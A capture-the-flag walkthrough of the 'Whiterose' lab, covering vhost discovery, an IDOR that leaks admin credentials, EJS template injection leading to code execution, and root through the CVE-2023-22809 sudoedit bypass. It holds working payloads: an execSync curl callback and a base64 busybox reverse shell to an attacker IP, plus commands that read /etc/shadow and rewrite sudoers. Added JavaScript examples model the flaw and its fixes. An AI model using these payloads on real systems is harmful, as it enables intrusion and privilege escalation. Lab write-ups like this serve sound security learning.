Whiterose

Yet another Mr. Robot themed challenge. - by ngn

The following post by 0xb0b is licensed under CC BY 4.0


Recon

We start with an Nmap scan and find two open ports: SSH on port 22 and an nginx/1.14.0 web server on port 80.

Visiting the index page of the web server redirects us to cyprusbank.thm. We add this hostname to /etc/hosts and reload the page.

whiterose.thm → cyprusbank.thm

After we have reloaded the page, we only see a static page without any functionality.

The directory scan did not reveal anything either.

A vhost scan with FFuF reveals two vhosts, www and admin, where admin points to a page we have not seen yet. We add both to /etc/hosts.

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://cyprusbank.thm/ -H "Host:FUZZ.cyprusbank.thm" -fw 1

A directory scan with Feroxbuster reveals no endpoints beyond those we also find by browsing manually.

Web Access Olivia Cortez

The index page of admin.cyprusbank.thm redirects us to a login page. Credentials for this login are obtained from the room description.

We can log in as Olivia Cortez, but this user only has limited permissions: we cannot read all of the data, and the settings endpoint is not available to us.

Web Access Gayle Bev

We can, however, look at the message history. During our visit it is requested with ?c=5, so the parameter c is a candidate for IDOR.

http://admin.cyprusbank.thm/messages/?c=5

With the parameter value 0 we find the credentials of the admin user Gayle Bev.

http://admin.cyprusbank.thm/messages/?c=0

We use the found credentials to log in as Gayle Bev and are successful.

We are now able to read the telephone numbers.

Shell as web

As Gayle Bev we have access to the settings endpoint, where customer passwords can be set. What stands out is that the submitted password is reflected in the response, which immediately suggests XSS or SSTI.

If we intercept a request and omit parameters such as the password, an error message appears. The error reveals that .ejs files are included, i.e. the page is rendered with EJS templates.

Searching for SSTI payloads that apply when EJS is used, we find the following two sources:

We use the payload from the article and first try to call back to our web server to test whether it works.

%%1");process.mainModule.require('child_process').execSync('curl http://10.14.90.235');//

We receive the callback immediately. Great, we have an SSTI that we can leverage for RCE.

Next, we prepare a reverse shell. We use a simple base64-encoded busybox reverse shell generated with revshells.com.

We set up a listener and use the following payload to spawn the reverse shell.

name=a&passord=b&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('bash -c "echo YnVzeWJveCBuYyAxMC4xNC45MC4yMzUgNDQ0NSAtZSAvYmluL2Jhc2g= | base64 -d | bash"');//

We receive a connection back as the user web and upgrade the shell. In the home directory of web we find the first flag.
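To make clear why the payloads above work, here is an added example that is not code from this writeup, from EJS or from Express. It is a deliberately small model of the code path the payloads abuse: ejs.renderFile() copies data.settings['view options'] into its render options, and ejs.compile() splices opts.outputFunctionName verbatim into the JavaScript source it hands to new Function(). An application that calls res.render('view', req.body) therefore lets the request body choose that option. The function names, the template subset and the constructed request body are assumptions made for illustration; the injected code here only sets a global flag instead of running a shell command.

```javascript
// Added example, not code from the writeup or from the EJS/Express projects.
// Simplified model of EJS render-option injection (the outputFunctionName path)
// next to the two fixes: the identifier check EJS >= 3.1.7 applies, and the
// application-side habit of passing only named fields to the renderer.
// Real EJS also HTML-escapes <%= %> output; that is omitted here.

const JS_IDENTIFIER = /^[a-zA-Z_$][0-9a-zA-Z_$]*$/; // same check EJS >= 3.1.7 uses

// Model of ejs.compile(): supports only <%= expr %> interpolation.
// validate=false reproduces the injectable behaviour, validate=true the fix.
function compileTemplate(template, opts, validate) {
  let prepended = '';
  if (opts.outputFunctionName) {
    if (validate && !JS_IDENTIFIER.test(opts.outputFunctionName)) {
      throw new Error('outputFunctionName is not a valid JS identifier.');
    }
    // Vulnerable line: the option value becomes source code, so a value such as
    // "x;process.mainModule.require('child_process').execSync('id');//" runs on render.
    prepended = 'var ' + opts.outputFunctionName + ' = __append;\n';
  }
  let body = '';
  let last = 0;
  const tag = /<%=([\s\S]*?)%>/g;
  let m;
  while ((m = tag.exec(template)) !== null) {
    body += '__append(' + JSON.stringify(template.slice(last, m.index)) + ');\n';
    body += '__append(' + m[1].trim() + ');\n';
    last = tag.lastIndex;
  }
  body += '__append(' + JSON.stringify(template.slice(last)) + ');\n';
  const src =
    'var __output = "";\n' +
    'function __append(s) { if (s != null) __output += String(s); }\n' +
    prepended +
    'with (locals || {}) {\n' + body + '}\n' +
    'return __output;';
  return new Function('locals', src);
}

// Model of ejs.renderFile(): the "view options" override is what promotes
// request data into compile options.
function renderWithData(template, data, validate) {
  const opts = {};
  const viewOpts = data.settings && data.settings['view options'];
  if (viewOpts) Object.assign(opts, viewOpts); // EJS uses utils.shallowCopy here
  return compileTemplate(template, opts, validate)(data);
}

// Application-level fix: hand the renderer only the fields the view needs,
// so a "settings" key in the request body never reaches it.
function pickLocals(body) {
  return { name: String(body.name ?? ''), password: String(body.password ?? '') };
}

// Constructed request body (an assumption), shaped as body-parser's extended
// urlencoded mode would parse
// "name=a&password=b&settings[view options][outputFunctionName]=x;...;//".
const attackerBody = {
  name: 'a',
  password: 'b',
  settings: { 'view options': { outputFunctionName: 'x;globalThis.sstiCanary = true;//' } },
};
const template = 'Password for <%= name %> set to <%= password %>';

// Reports whether the injected code ran for a given renderer/locals combination.
function injectionRuns(validate, locals) {
  delete globalThis.sstiCanary;
  try {
    renderWithData(template, locals, validate);
  } catch (e) {
    return false; // validation rejected the option before any code was generated
  }
  return globalThis.sstiCanary === true;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable EJS, raw body  :', injectionRuns(false, attackerBody));
  console.log('patched EJS, raw body     :', injectionRuns(true, attackerBody));
  console.log('vulnerable EJS, picked    :', injectionRuns(false, pickLocals(attackerBody)));
}
```

Either fix alone stops the payload: the identifier check refuses the option value before any source is generated, and picking named fields means the settings key never reaches the renderer at all. In the real app only the version check is visible from outside, which is why the error page naming EJS was such a useful hint.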

Shell as root

We see that we are allowed to run sudoedit as root via sudo without a password, but only for the specific file /etc/nginx/sites-available/admin.cyprusbank.thm.

After a short search, we find CVE-2023-22809, a sudoedit bypass that affects sudo versions 1.8.0 through 1.9.12p1. sudoedit passes the contents of the EDITOR variable (likewise SUDO_EDITOR and VISUAL) to the editor without handling a "--" argument, so any file paths appended after "--" are opened with root privileges alongside the permitted file. This lets us read and edit arbitrary files regardless of which file the sudoers rule allows.

With sudo --version we confirm that a vulnerable version is installed.
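As an added example that is not part of the original writeup, the following decides whether a sudo version banner falls inside the affected range and whether an editor string carries the extra file arguments the bypass needs. A naive string comparison gets the "pN" suffix wrong ("1.9.12p1" versus "1.9.12p2" versus "1.9.13"), so the version is turned into a numeric tuple first. The function names and the sample banners are assumptions; the affected range (1.8.0 through 1.9.12p1, fixed in 1.9.12p2) is the published one.

```javascript
// Added example, not from the writeup: applicability check for CVE-2023-22809.

// Parses the first "Sudo version X.Y[.Z][pN]" occurrence of `sudo --version`
// output into [major, minor, patch, plevel]; returns null if none is found.
function parseSudoVersion(text) {
  const m = /Sudo version (\d+)\.(\d+)(?:\.(\d+))?(?:p(\d+))?/.exec(text);
  if (!m) return null;
  return [Number(m[1]), Number(m[2]), Number(m[3] ?? 0), Number(m[4] ?? 0)];
}

// Lexicographic compare of two version tuples: -1, 0 or 1.
function compareVersions(a, b) {
  for (let i = 0; i < 4; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

const AFFECTED_MIN = [1, 8, 0, 0];   // 1.8.0
const AFFECTED_MAX = [1, 9, 12, 1];  // 1.9.12p1

// true if the banner names a version inside the affected range,
// false if outside it, null if no version could be parsed.
function vulnerableTo22809(banner) {
  const v = parseSudoVersion(banner);
  if (!v) return null;
  return compareVersions(v, AFFECTED_MIN) >= 0 && compareVersions(v, AFFECTED_MAX) <= 0;
}

// The bypass also needs the editor string to carry "--" followed by at least
// one extra path, which is exactly what the fixed versions refuse.
function editorSmugglesFiles(editor) {
  const args = editor.trim().split(/\s+/);
  const i = args.indexOf('--');
  return i !== -1 && i < args.length - 1;
}

if (typeof require !== 'undefined' && require.main === module) {
  let banner = '';
  try {
    banner = require('child_process')
      .execSync('sudo --version', { stdio: ['ignore', 'pipe', 'ignore'] })
      .toString();
  } catch (e) {
    // sudo missing or not runnable; fall through with an empty banner
  }
  console.log('sudo affected by CVE-2023-22809:', banner ? vulnerableTo22809(banner) : 'sudo not found');
  console.log('EDITOR smuggles files:', editorSmugglesFiles(process.env.EDITOR || ''));
}
```

On the defensive side the same two observations apply in reverse: patch to 1.9.12p2 or later, and until then strip the editor variables for sudoedit rules in sudoers so the "--" trick has nothing to ride on.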

With export EDITOR="vi -- /etc/shadow" we make sudoedit open /etc/shadow in vi in addition to the permitted file.

export EDITOR="vi -- /etc/shadow"
sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm

And we are able to read /etc/shadow.

Next, we try that with the root flag and are able to read it.

export EDITOR="vi -- /root/root.txt"
sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm

To escalate our privileges to root, we attempt to edit the /etc/sudoers file.

export EDITOR="vi -- /etc/sudoers"
sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm

Here we target the line that grants us the sudoedit command:

web ALL=(root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm

and replace it with the following:

web ALL=(root) NOPASSWD: ALL

After saving the file we can execute any command as root without providing a password, and we use that to switch to the root user. As root we find the final flag at /root/root.txt.
